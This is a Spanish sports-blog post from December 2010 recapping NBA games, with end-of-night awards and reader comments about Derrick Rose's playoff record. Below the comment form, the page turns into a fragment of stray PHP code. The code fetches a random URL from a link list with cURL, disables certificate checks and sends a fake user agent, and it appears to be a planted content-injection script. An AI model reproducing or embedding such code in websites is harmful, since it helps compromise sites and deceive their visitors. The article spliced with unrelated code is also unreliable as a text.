La Crónica (04/12/2010)

05 de December de 2010 por txusma

Carlos Boozer ya esta aquí. Tras una fichaje multimillonario, una inoportuna lesión y 2 partidos para ir cogiendo el tono, el ex jugador de Utah ya ha aparecido para aportar lo que se espera de él. Como es costumbre, fue Derrick Rose la figura de los Bulls en su victoria frente los Rockets por 116-119, pero Boozer jugó el papel de escudero perfecto aportando 25 puntos y 9 rebotes. El partido se resolvió en la prórroga tras anotar Rose un triple sobre la bocina en el tiempo regular. Después, en el tiempo extra, Rose continuó su exhibición anotando su cuarto triple de la noche y otra canasta de bella factura. ¿Convierte Boozer a los Bulls en un contendiente serio no sólo por el título de conferencia sinó por el anillo?

Uno de sus máximos rivales sufrió ayer una dura derrota en Milwaukee. Los Magic se presentaron a jugar sin 4 de sus jugadores aquejados de un virus estomacal y evidentemente, las bajas de Jameer Nelson y Dwight Howard se notaron de manera importante (85-96). Bogut hizo y deshizo a su antojo en la zona de Orlando y sinó resolvió el partido antes fue por su nefasto acierto desde el tiro libre. Brandon Jennings fue de nuevo el de las grandes ocasiones.

En cambio, Miami no tuvo muchos problemas para liquidar a unos Hawks por los que más vale no apostar mucho dinero y menos si juegan sin su principal figura, Joe Johnson. Los 3 magníficos pasaron de 20 puntos y los Heat suman su cuarta victoria seguida (77-89).

Por su parte, Nowitzki y los suyos suman ya 9 victorias consecutivas y se afianzan en el liderato de la liga. La de ayer no fue nada fácil y tuvieron que tirar de oficio y defensa para doblegar a unos Kings que salieron en tromba anotando 37 puntos en el primer cuarto, su récord de la temporada. No fue hasta el último cuarto, en el que les clavaron un parcial de 15-4 en los últimos 5 minutos, que los Mavs remontaron y amarraron la victoria (105-103).

En los otros 2 partidos de la noche, victoria de los Sixers frente los Bobcats (91-109) con Jodie Meeks en plan Iverson (¿qué ha sido de Louis Williams?), y de los Wolves frente los Cavs (95-129) a pesar de la baja de Beasley. Si Love anota 28 puntos y coge 19 rebotes, todo es más fácil.

PREMIOS

MVP: Triple para forzar la prórroga, 5 puntos en el tiempo añadido, 30 puntos en total, 7 rebotes, 11 asistencias, 5 robos… El partido de Derrick Rose sólo puede ser calificado de 10. Los mega partidos de Kevin Love (28 puntos y 19 rebotes) y Andrew Bogut (31-18) se quedan a un paso.

Rookie: A Wes Johnson se le hizo enorme el aro anoche: 8 de 9 en tiro para un total de 20 puntos. Además aportó 6 rebotes y 2 asistencias.

Sorpresa: Anotación, anotación y anotación. A Jodie Meeks no le pidas mucho más. Anoche tuvimos una prueba de su talento: 26 puntos, 1 rebote y 1 asistencia.

Decepción: De momento no parece que el fichaje de Corey Maggettee resultara una buena idea. Las lesiones y la falta de acierto no le dejan arrancar. Anoche falló los 5 tiros que intentó y se quedó con 3 míseros puntos.

Esfuerzo en vano: Tyreke Evans lleva un tiempo jugando medio lesionado y es posible que tenga que parar definitivamente para descansar y recuperar. Antes de eso, anoche tuvo tiempo de anotar 25 puntos y repartir 8 asistencias. Un partido como los de antaño.

Comenta

5 comentarios a esta entrada

  1. troll dice:
    #1

    Cousins 20-8

      Citar

  2. -=TheKing=- dice:
    #2

    Si no veo a Bulls candidatos al anillo, más que nada es porque Rose no ha demostrado nada en los momentos claves de play-off, pero Boozer puede ayudar a abrir agujeros en defensas para que Rose y Korver se inflen. Rose- Korver- Boozer en el mismo quinteto puede hacer descosidos, pero claro luego llegan los Lakers y Celtics que tienen lo mismo y más curtido y ya se sabe……

      Citar

  3. Txusma dice:
    #3

    Rose no ha demostrado nada en Playoffs? Hace 2 temporada los Bulls pusieron contra las cuerdas a los Celtics en una de las mejores eliminatorias que recuerdo con Rose (rookie) elevándose por encima de todos con 20 puntos, 6 rebotes y 6 asistencias por encuentro, cifras ostensible mejores que las que había promediado en liga regular.
    Y el año pasado, Rose se fue hasta los 27 puntos y 7.2 asistencia por partido en la eliminatoria frente los Cavaliers.
    Hablamos de un jugador de tercer año, ojito…

      Citar

  4. Llukas 70 dice:
    #4

    Totalmente de acuerdo con Txusma.

      Citar

  5. LEmontus dice:
    #5

    muy gracioso lo de rose y las eliminatorias contra celtics para mi fueron las mejores del año y rose fue el mejor.

    Que bueno es Bogut.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>